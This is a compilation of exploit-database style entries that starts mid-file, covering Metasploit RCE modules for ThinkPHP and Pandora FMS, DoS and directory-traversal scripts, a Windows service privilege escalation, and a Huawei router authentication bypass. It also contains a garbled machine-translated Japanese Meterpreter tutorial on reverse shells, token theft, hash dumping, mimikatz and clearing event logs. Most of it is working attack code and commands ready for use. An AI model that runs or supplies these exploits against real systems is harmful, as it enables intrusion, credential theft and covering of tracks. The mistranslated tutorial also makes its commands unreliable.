res.body.length / 2]) end =begin wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1 * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0) > POST /index.php?s=captcha HTTP/1.1 > Host: 127.0.0.1:8081 > User-Agent: curl/7.54.0 > Accept: */* > Content-Length: 72 > Content-Type: application/x-www-form-urlencoded > } [72 bytes data] * upload completely sent off: 72 out of 72 bytes < HTTP/1.1 200 OK < Date: Mon, 13 Apr 2020 06:44:05 GMT < Server: Apache/2.4.25 (Debian) < X-Powered-By: PHP/7.2.12 < Vary: Accept-Encoding < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [60 bytes data] * Connection #0 to host 127.0.0.1 left intact uid=33(www-data) gid=33(www-data) groups=33(www-data) wvu@kharak:~$ =end def exploit_5_0_23(cmd) # XXX: The server may block on executing our payload and won't respond res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => {'s' => 'captcha'}, 'vars_post' => { '_method' => '__construct', 'filter[]' => 'system', # TODO: Debug ARCH_PHP 'method' => 'get', 'server[REQUEST_METHOD]' => cmd }, 'partial' => true }, datastore['CmdOutputTimeout']) return unless res && res.code == 200 vprint_good("Successfully executed command: #{cmd}") return unless datastore['PAYLOAD'] == 'cmd/unix/generic' # Clean up output from cmd/unix/generic vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, '')) end end

# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) # Date: 2020-04-07 # Exploit Author: Jacob Baines # Vendor Homepage: https://amcrest.com/ # Software Link: https://amcrest.com/firmwaredownloads # Version: Many different versions due to number of Dahua/Amcrest/etc # devices affected # Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 # 4.000.00AC000.0 # CVE : CVE-2020-5735 # Advisory: https://www.tenable.com/security/research/tra-2020-20 # Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash import argparse import hashlib import socket import struct import sys import md5 import re ## DDNS test functionality. Stack overflow via memcpy def recv_response(sock): # minimum size is 32 bytes header = sock.recv(32) # check we received enough data if len(header) != 32: print 'Invalid response. Too short' return (False, '', '') # extract the payload length field length_field = header[4:8] payload_length = struct.unpack_from('I', length_field) payload_length = payload_length[0] # uhm... lets be restrictive of accepted lengths if payload_length < 0 or payload_length > 4096: print 'Invalid response. Bad payload length' return (False, header, '') if (payload_length == 0): return (True, header, '') payload = sock.recv(payload_length) if len(payload) != payload_length: print 'Invalid response. Bad received length' return (False, header, payload) return (True, header, payload) def sofia_hash(msg): h = "" m = hashlib.md5() m.update(msg) msg_md5 = m.digest() for i in range(8): n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e if n > 9: if n > 35: n += 61 else: n += 55 else: n += 0x30 h += chr(n) return h top_parser = argparse.ArgumentParser(description='lol') top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to") top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="37777") top_parser.add_argument('-u', '--username', action="store", dest="username", help="The user to login as", default="admin") top_parser.add_argument('--pass', action="store", dest="password", required=True, help="The password to use") args = top_parser.parse_args() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Attempting connection to " + args.ip + ":" + str(args.port) sock.connect((args.ip, args.port)) print "[+] Connected!" # send the old style login request. We'll use blank hashes. This should # trigger a challenge from new versions of the camera old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash "\x05\x02\x00\x01\x00\x00\xa1\xaa") sock.sendall(old_login) (success, header, challenge) = recv_response(sock) if success == False or not challenge: print 'Failed to receive the challenge' print challenge sys.exit(0) # extract the realm and random seed seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", challenge) if seeds == None: print 'Failed to extract realm and random seed.' print challenge sys.exit(0) realm = seeds.group(1) random = seeds.group(2) # compute the response realm_hash = md5.new(args.username + ":" + realm + ":" + args.password).hexdigest().upper() random_hash = md5.new(args.username + ":" + random + ":" + realm_hash).hexdigest().upper() sofia_result = sofia_hash(args.password) final_hash = md5.new(args.username + ":" + random + ":" + sofia_result).hexdigest().upper() challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + args.username + "&&" + random_hash + final_hash) sock.sendall(challenge_resp) (success, header, payload) = recv_response(sock) if success == False or not header: print 'Failed to receive the session id' sys.exit(0) session_id_bin = header[16:20] session_id_int = struct.unpack_from('I', session_id_bin) if session_id_int[0] == 0: print "Log in failed." sys.exit(0) session_id = session_id_int[0] print "[+] Session ID: " + str(session_id) # firmware version command = "Protocol: " + ("a" * 0x300) + "\r\n" command_length = struct.pack("I", len(command)) firmware = ("\x62\x00\x00\x00" + command_length + "\x04\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + command) sock.sendall(firmware) (success, header, firmware_string) = recv_response(sock) if success == False and not header: print "[!] Probably crashed the server." else: print "[+] Attack failed."

# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass # Date: 2020-04-08 # Exploit Author: Spad Security Group # Vendor Homepage: https://www.djangoproject.com/ # Software Link: https://pypi.org/project/Django/ # Version: 3.0 =< # Tested on: windows 10 # Language: python3.8 # t.me/SpadSec # Spad Security Group from requests import Session import sys from bs4 import BeautifulSoup from time import sleep from colorama import Fore, Style from random import choice from os import name, system colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] def cleaner(): if name == "nt": system("cls") else: system("clear") def logo_printer(): cleaner() logo = r""" \_______/ `.,-'\_____/`-.,' /`..'\ _ /`.,'\ / /`.,' `.,'\ \ /__/__/ \__\__\__ \ \ \ / / / \ \,'`._,'`./ / \,'`./___\,'`./ ,'`-./_____\,-'`. / \ """ _logo_enumer = 0 for char in logo: sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") sys.stdout.flush() _logo_enumer +=1 sleep(0.005) print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") class DjangoCsrfMiddleWareBypass: def __init__(self, url: str, username: str, password: str): self.url = url self.username = username self.password = password logo_printer() self.cookies = {} self.session = Session() self.bypass() def spad_printer(self, string): print("\n") for char in string: sys.stdout.write(char) sys.stdout.flush() sleep(0.05) def bypass(self): global colors _conn = self.session.get(self.url) self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") for key, value in _conn.cookies.items(): self.cookies[key] = value self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!") soup = BeautifulSoup(_conn.text, "lxml") csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) if len(login.history) >= 2: if login.history[1].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") else: self.spad_printer("[-] Error") else: if login.history: if login.history[0].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") for key, value in self.session.cookies.items(): self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") if __name__ == "__main__": try: url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] DjangoCsrfMiddleWareBypass(url, username, password) except IndexError: logo_printer() for char in f"[!] python {sys.argv[0]} http://google.com username password": sys.stdout.write(char) sys.stdout.flush() sleep(0.05)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Pandora FMS Ping Authenticated Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability found in Pandora FMS 7.0NG and lower. net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands. }, 'Author' => [ 'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module ], 'DisclosureDate' => '2020-03-09', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Automatic Target', {}] ], 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']), OptString.new('USERNAME', [true, 'The username to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php') }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.body =~ /Pandora/i return CheckCode::Safe end pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first version = Gem::Version.new(pandora_version) print_status("Pandora FMS version #{version}") if version if Gem::Version.new(version) <= Gem::Version.new('7.0NG') return Exploit::CheckCode::Appears end CheckCode::Detected end def authenticate res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'vars_get' => { 'login' => '1' }, 'vars_post' => { 'nick' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'], 'login_button' => 'Login' } }) return auth_succeeded?(res) end def auth_succeeded?(res) unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') print_error('Authentication failed!') return false end print_good('Successfully authenticated') print_status('Attempting to retrieve session cookie') @cookie = res.get_cookies unless @cookie.include?('PHPSESSID') print_error('Error retrieving cookie!') return false end print_good("Successfully retrieved session cookie: #{@cookie}") true end def exploit print_status('Exploiting...') execute_cmdstager(flavor: :wget, nospace: true) end def execute_command(cmd, opts = {}) print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})") auth = authenticate unless auth fail_with Failure::NoAccess, 'Please provide a valid username and password.' end id_agente = 1 while !session_created? && id_agente <= 10 send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'cookie' => @cookie, 'vars_get' => { 'sec' => 'estado', 'sec2' => 'operation/agentes/ver_agente', 'tab' => 'extension', 'id_agente' => "#{id_agente}", 'id_extension' => 'network_tools' }, 'vars_post' => { 'operation' => '2', 'select_ips' => ";#{cmd}", 'community' => 'public', 'submit' => 'Execute' } }) id_agente += 1 end end end

0x01メートルプレター自動特権レイズ 1。バックドアプログラムを生成します KALIのコマンドラインの下で次のコマンドを直接実行して、Windows用のリバウンドトロイの木馬を取得します。 MSFVENOM -P Windows/MeterPreter/Reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exeここでは、生成されたトロイの木馬のペイロードを:に指定します。 Windows/MeterPreter/Reverse_tcp、跳ね返るモニター側のアドレスは172.16.11.2、リスニングポートは4444、ファイル出力形式はexeであり、path /tmp/hack.exeに保存されます 2。リスニングを実行 使用 Exploit/Multi/Handler ペイロードを設定します Windows/MeterPreter/Reverse_tcp lhostを設定します 172.16.11.2 オプションを表示します リスニング用に構成したモジュールを有効にするために、エクスプロイトコマンドを入力してください。 3。 Trojan をアップロードして実行します がアップロードされ、スクリプトトロイの木馬を実行します。ここでは、一連の貫通テストを通じてターゲットマシンのウェブシェルを取得したと仮定します。スクリプトTrojanのファイル管理機能を介して上記のTrojan Hack.exeを正常にアップロードしました。プログラムの絶対的なパスは次のとおりです。 c: \ www \ hack.exe次に、スクリプトトロイの木馬のコマンド実行関数を介して上記のトロイの木馬を実行しようとします。 C: //www/hack.exe/キャラクターの逃亡を避けるために、私たちは//ここでパスを使用します 次に、実行後、トロイの木馬が表示されているように表示されていることがわかります。以前に聞いたメタプロイトコマンドラインウィンドウに切り替えて、ターゲットマシンが接続していることがわかります。 4。 MeterPreter Basicライセンスメータープレーターはです Metasploitフレームワークのキラー武器は、通常、脆弱性のオーバーフロー後の攻撃として使用されます。攻撃は、脆弱性が開始された後、コントロールチャネルに戻ることができます。次に、MeterPreterセッションを使用して自動特権昇格操作を実行し、次のコマンドを直接実行すると、MSFは適切な方法を自動的に選択して現在の許可を増やします。 GetSystem 上記の返品は、MeterPreterセッションの自動特権提起が成功することを意味します。この時点で、ターゲットマシンがドメイン環境に属し、ドメイン管理者によって実行されるプロセスがある場合、指定されたプロセスPIDからドメイン管理者グループトークンを盗み、興味深いことを行うことができます（ドメインアカウントの追加やドメイン管理者グループへのドメインアカウントの追加など）。 MeterPreterセッションでは、PSコマンドを実行してターゲットマシンの現在のプロセスを表示します。ここでプロセスが表示され、実行中のアカウントがドメイン管理者であると仮定します。最初の列で対応するプロセスPIDを見つけることができます（実際、システムアカウントで実行されているプロセスを見つけます）。 PIDは2584：です。次のステートメントを実行して、ユーザープロセスのトークンを盗むことができます。 Steel_token 2584 この方法は通常、ドメイン管理者のトークンを盗むために使用され、それを実行します GetUIDは、システムユーザーが成功したと呼ばれていることがわかります：は既にシステムの許可であるため、次のコマンドを実行して、SAMデータベースからパスワードのハッシュ値をエクスポートしようとします。 2008年に、GetSystemコマンドとHashdumpコマンドが例外をスローする場合、システムシステムの許可を使用して実行されるプロセスに移行する必要があります。後で紹介します。次のシェルコマンドを実行して、メータープレターセッションインターフェイスでCMDシェルを使用します。このCMDSHELLは、もちろん、継承されたメータープレーターセッションのシステム許可です。次のCMDコマンドを実行して、ターゲットマシンにアカウントテストを追加しようとします。 ネットユーザーテスト v5est0r /add ネットローカルグループ管理者のテスト /追加 次に、MeterPreterセッションを使用して、ターゲットマシンのリモートデスクトップサービスの3398ポートを開きます（このモジュールは、実際のテストに従ってWindows 2003ホストのみをサポートします）： getgui -eを実行します 最後に、新しい端末ウィンドウを作成し、次のコマンドを実行してrdesktopを呼び出してターゲットマシンのリモートデスクトップに接続します。 rdesktop -u test -P V5est0r 172.16.12.2.2 -U: Make Username -P：パスワードを指定 0x02 オーバーフロー脆弱性モジュールのエスカレーション 一般的に、Webシェルに対応するWebサービスの権限は非常に低く、一般的にユーザーの許可ですが、実行後にシステムに直接最も高いアクセス許可を持つサーバーにも遭遇しています。この場合、ユーザーは通常直接追加されます。権限が低い場合は、システムの権利にアップグレードする必要があります - Windowsの最高の権限。ハッカーは通常、EXPプログラムを使用して権利を引き上げます。これは、その後の実験で紹介します。もちろん、MSFに基づく権利を高めるためにOverflowの脆弱性モジュールを呼び出すことも良い方法です。バッファオーバーフロー：バッファーは、プログラムを実行するためにユーザーがコンピューターに適用する連続メモリであり、特定のタイプのデータを保存します。バッファオーバーフローとは、一般的で非常に有害なシステム攻撃方法を指します。プログラムのバッファーまでコンテンツを作成することにより、バッファーはオーバーフローし、それによりプログラムのスタックを破壊し、プログラムを回して攻撃の目的を達成するために他の指示を実行します。さらに深刻なことは、バッファオーバーフロー攻撃がリモートネットワーク攻撃の大部分を占めることであり、匿名のインターネットユーザーにホストの一部またはすべての制御を獲得する機会を与えることができます。このタイプの攻撃により、誰もがホストを制御できるようになるため、セキュリティの脅威の非常に深刻なクラスを表しています。 1。 脆弱性モジュールを呼び出すには、上記のMeterPreter自動特権の実験コンテンツを参照して、ターゲットマシンの利用可能なメータープレターセッションを取得してください。次に、MeterPreterセッションで次のコマンドを入力します。 背景 //現在のMeterPreterセッションをバックグラウンド実行に変換します。次に、MSFコマンドラインで次のコマンドを実行して、2015年にMicrosoftの利用可能な脆弱性モジュールを検索します。 検索 MS15 //下の図に示すように、キーワード関連の脆弱性を検索します。多くの脆弱性モジュールが見つかりました。MS15_051の脆弱性を選択して、権限を増やし、次のコマンドを実行します。 使用 Exploit/Windows/local/ms15_051_client_copy_imageこのアクティブモジュールのエスカレーション操作を実行するためにどのセッションを指定するかを指定する必要があります。次のコマンドを実行して、サービスセッションが1であることを指定します。 セットセッション 1 //今すぐバックドアに接続されるID番号1を設定します。ここには1つのセッションしかありません、そして1に直接接続します 2。 オーバーフローを実行し、次のコマンドを直接実行して、権限を上げるために脆弱なモジュールを呼び出します。 エクスプロイト 返品情報によると、新しいセッションが作成されておらず、システムの許可がアップグレードされたことを思い出させることができます。システムの許可が現在利用できない場合、システムのプロセスに昇格し、プロセスPIDが提供されます。一般的に言えば、特権のエスカレーションが成功したとしても、次のコマンドを実行して接続セッションを返しますが、GetSUID後に元の許可が表示されます。 セッション -i 1 PSを実行してプロセスを表示します。プロンプトに従って、上記のPIDのプロセスを見つけました。ここでは、システム権限を備えたプロセスをランダムに見つけました。 PIDは3240です。その後、移行コマンドを使用して、現在のセッションプロセスを指定されたプロセスIDに移行する必要があります 移動します 3240 上記の図に見られるように、プロセスの移行は成功しています。次に、GetUIDを実行して、現在のシステム許可が利用可能であることがわかります。 0x03 その後の権利促進運用1。 Basic Information Collectionは、ターゲットマシンが仮想マシンであるかどうかを検出します。 MeterPreterセッションで次のコマンドを実行します。 走る 投稿/Windows/sghate/checkvm＃仮想マシンになるかどうかはここでは正確ではありません。モジュールコードは、メータープレーターのKillavスクリプトを介してターゲットホストが実行しているウイルス対策ソフトウェアを改善する必要があります。 MeterPreterセッションで次のコマンドを実行します。 Killavを実行します このモジュールを改善する必要があり、ここで殺されたプロセスはCMDです。しかし、時にはそれは便利です。インストールソフトウェア情報を取得するには、MeterPreterセッションで次のコマンドを実行します。 post/windows/gracking/enum_applicationsを実行してください#getインストールソフトウェア情報 ターゲットマシンの最新のファイル操作を取得し、MeterPreterセッションで次のコマンドを実行します。 Post/Windows/Grazgn/Dumplinks＃最新のファイル操作を実行します 2。 ハッシュおよびプレーンテキストパスワードを読んで、ターゲットマシンシステムのユーザーハッシュを取得し、メータープレーターセッションで次のコマンドを実行します。 Post/Windows/Gather/smart_hashdumpを実行します TestInghashesに対するモジュールの実行は次のとおりです 接続されている場合、データベースに保存されます。 JTRパスワードファイル形式 to:/home/croxy/.msf4/loot/20155092922525044_default_10.0.2.15_windows.hashes_407551.txtdumping パスワードハッシュ.レジストリからハッシュを抽出するシステムとして実行されます ブートキーを取得.計算 syskey 8c2c8d96e92a8ccfc407a1ca48531239を使用したHbootキー. ユーザーリストとキーを取得. ユーザーキーの復号化.ダンピング パスワードのヒント. [+] croxy:'whoareyou ' パスワードハッシュのダンプ. [+] administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:3:33333333333: [+] HomeGroupUser $ :10023360AAD3B435B51404EEAAD3B435B51404EE:E3F0347F8B369CAC49E62A18E34834C033333333:33333333: [+] test:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d: As mentioned above, we obtained the hask of the local account and obtained the plaintextパスワード。 Mimikatzモジュールを最初にロードし、MeterPreterセッションで次のコマンドを実行する必要があります。 Mimikatzをロードし、現在のプロセスがシステム許可であることを確認し、次のコマンドを直接実行する必要があります。 MSV 上記の写真に示すように、次の情報が返されます。 [+] MSV資格情報のSystem Retrieの実行上記の返品情報は、現在のプロセスが「システム」の許可であることを示しています。次に、次のコマンドを実行して、システムユーザーのクリアテキストパスワードをエクスポートします。 Kerberosは、下の図に示されています。 Plantextパスワードは正常にエクスポートされ、テストユーザーのパスワードはV5est0r：次のコマンドを実行して、Mimikatzコマンドラインを介してシステムユーザーハッシュをエクスポートします。 meterpreter mimikatz_command -f samdump:hases 次のコマンドを実行して、「Mimikatz」コマンドラインを介してシステムユーザーのクリアテキストパスワードをエクスポートします。 mimikatz_command -f sekurlsa:searchpasswords 3。 トレースをきれいにするには、次のコマンドを実行します。 Clearevは、戻るために次のように見ることができます。 MeterPreter Clearev このモジュールは、アプリケーション、システム、セキュリティモジュールの3つの側面から履歴記録をクリーンアップしていることがわかります。実際、MSFはTimestomp関数モジュールを提供し、ファイル時間を変更しますが、実際のテストはあまり意味がありません。私たちはここで人気のある科学だけをやっています： MeterPreter Timestomp C: \\ www -c '09/09/1980 12:12:34 'ファイルの作成時間を変更します MeterPreter TimeStomp C: \\ jzking121.txt -m '01/01/1991 12:12:34'Modifyファイルの変更時間 MeterPreter TimeStomp C: \\ jzking121.txt -f c: \\ rhdsetup.logコピーrhdsetup.log属性をjzking121にコピーします。実際のテストでは、時折エラーがあります。サーバーにログインして、ファイル時間を手動で変更できます。 0x04 Always Installeevated Rights 1。 MSIインストールファイルを生成 メータープレターセッションを取得した後、いくつかの従来の方法でシステムの許可を取得できないと仮定して、常に平行にされた権利は希望をもたらすかもしれません。 AlwaysInstallevatedは、Microsoftがシステム許可を使用して不正なユーザーがインストールファイル（MSI）を実行できるようにする設定です。ただし、この種の資格に対してこれを権利を与えるには、特定のセキュリティリスクがあります。これがそうすれば、次の2つのレジストリ値が「1」に設定されるためです。 [hkey_current_user \ software \ policies \ microsoft \ windows \ installer] 'Alwaysinstallevated'=dword:00000001 [hkey_local_machine \ software \ policies \ microsoft \ windows \ installer] 「Alwaysinstallevated」=DWORD3:00000001これらの2つの重要な値を照会する最も簡単な方法は、CMDコマンドを使用することです。最初にシェルを実行して、メータープレーターセッションで `cmdshellを切り替えます。CMDSHELLの下で次のコマンドを実行して、上記のレジストリキー値を照会します。 reg クエリHKCU \ Software \ Policies \ Microsoft \ Windows \ installer /v 常に溶離しています Reg Query HKLM \ Software \ Policies \ Microsoft \ Windows \ installer /v 常に溶離しています ここでのクエリは、エラーを報告しています。注：このコマンドエラーが類似している場合：システムは 指定されたレジストリキーまたは値または：エラー:システムは、指定されたレジストリキーまたは値を見つけることができません。これは、常にインストールエレベートがグループポリシーで定義されていないため、関連するレジストリキーがないためかもしれません。 Always Installevatedが有効になっていると仮定したので、MSFvenomツールを使用して、管理者ユーザーをターゲットマシンに追加するMSIインストールファイルを生成できます。 msfvenom -p Windows/adduser user=msi pass=p@ssword123！ -f msi -o /tmp/add.msi //追加されたユーザーがここで指定され、ユーザー名はMSIで、パスワードは次のとおりです。 上の図に示すように返されるように、MSIファイルは/tmp/add.msiで正常に生成されました 2。 MSIファイルエスカレーションを実行 次に、インストールファイルをターゲットマシンc: \\ add.msi:にアップロードし、次のコマンドを実行します。 アップロード /tmp/add.msi C: \\ add.msi 新しく生成されたMSIファイルをターゲットマシンに正常にアップロードすると、Windowsコマンドラインmsiexecツールを使用してインストールできます（最初にシェルコマンドを実行して「cmdshellに切り替える必要があります）： シェル msiexec /quiet /qn /i c: \ add.msi Msiexecの関連パラメーターについては、次のように説明します。 /cieting:インストール中にユーザーにメッセージを送信します /QN:はGUIを使用しません /i:インストールプログラムが実行された後、ターゲットマシンで新しく作成された管理者ユーザーを検出できます。 CMDShellの下で次のコマンドを実行して、管理グループユーザーのリストを表示します。 ネット ローカルグループ管理者

# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-05-02 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe # Tested Version: 11.12 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: # 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py # 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard # 3.- Open AbsoluteTelnet # 4.- Select "new connection file", "Connection", "SSH1", "Use last username" # 5.- In "username" field paste Clipboard # 6.- Select "OK" # 7.- Crashed buffer = "\x41" * 1000 f = open ("absolutetelnet_username_SSH1.txt", "w") f.write(buffer) f.close()

# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path # Date: 2020-04-10 # Exploit Author: MgThuraMoeMyint # Vendor Homepage: https://windscribe.com # Version: v1.83 Build 20 # Tested on: Windows 10, version 1909 In windscribe v1.83 , there is a service via windscribe that every authenticated user can modify. C:\Users\mgthura>sc qc WindscribeService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WindscribeService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WindscribeService DEPENDENCIES : SERVICE_START_NAME : LocalSystem That shows that running as Local System this means that the BINARY_PATH_NAME parameter can be modified to execute any command on the system. I'll change binary_path_name with a command that add a user to administrators group , so it will be C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup administrators pentest /add" [SC] ChangeServiceConfig SUCCESS C:\Users\mgthura>sc stop WindscribeService SERVICE_NAME: WindscribeService TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x4 WAIT_HINT : 0x0 C:\Users\mgthura>sc start WindscribeService [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. Restarting service will cause the service to fail as the binary path would not point into the actual executable of the service. However the command will be executed successfully and the user will be added to the local administrators group.

# Exploit Title: TVT NVMS 1000 - Directory Traversal # Date: 2020-04-13 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html # Original Author : Numan Türle # CVE : CVE-2019-20085 import sys import requests import os import time if len(sys.argv) !=4: print " " print "Usage : python exploit.py url filename outputname" print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" print " " else: traversal = "../../../../../../../../../../../../../" filename = sys.argv[2] url = sys.argv[1]+traversal+filename outputname = sys.argv[3] content = requests.get(url) if content.status_code == 200: print " " print "Directory Traversal Succeeded" time.sleep(3) print " " print "Saving Output" os.system("touch " + outputname) output_write = open(outputname,"r+") output_write.write(content.text) output_write.close() else: print "Host not vulnerable to Directory Traversal!"

# Title: Huawei HG630 2 Router - Authentication Bypass # Date: 2020-04-13 # Author: Eslam Medhat # Vendor Homepage: www.huawei.com # Version: HG630 V2 # HardwareVersion: VER.B # CVE: N/A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm ************************Response************************ HTTP/1.1 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Fri, 01 Jan 2010 09:14:47 GMT Connection: Keep-Alive Content-Language: en Content-Type: application/javascript Content-Length: 141 while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ You can use that serial number to login to the router. #Reference: https://www.youtube.com/watch?v=vOrIL7L_cVc

# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal # Date: 2020-04-10 # Exploit Author: Basim Alabdullah # Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download # Version: 3.10.1 # Tested on: Debian8u2 # # Technical Details: # The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. # The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. # Note that disclosure of the shadow file may allow an attacker to discover users' passwords # # Impact: # -------- # Successful exploitation could allow an attacker to obtain sensitive # information. import requests import sys if len(sys.argv) <2: print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") sys.exit(-1) else: files=sys.argv[2] url=sys.argv[1] with requests.session() as s: urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" response = s.get(urlz, auth=('admin', 'admin'), verify=False) txt=response.text print(response.text)

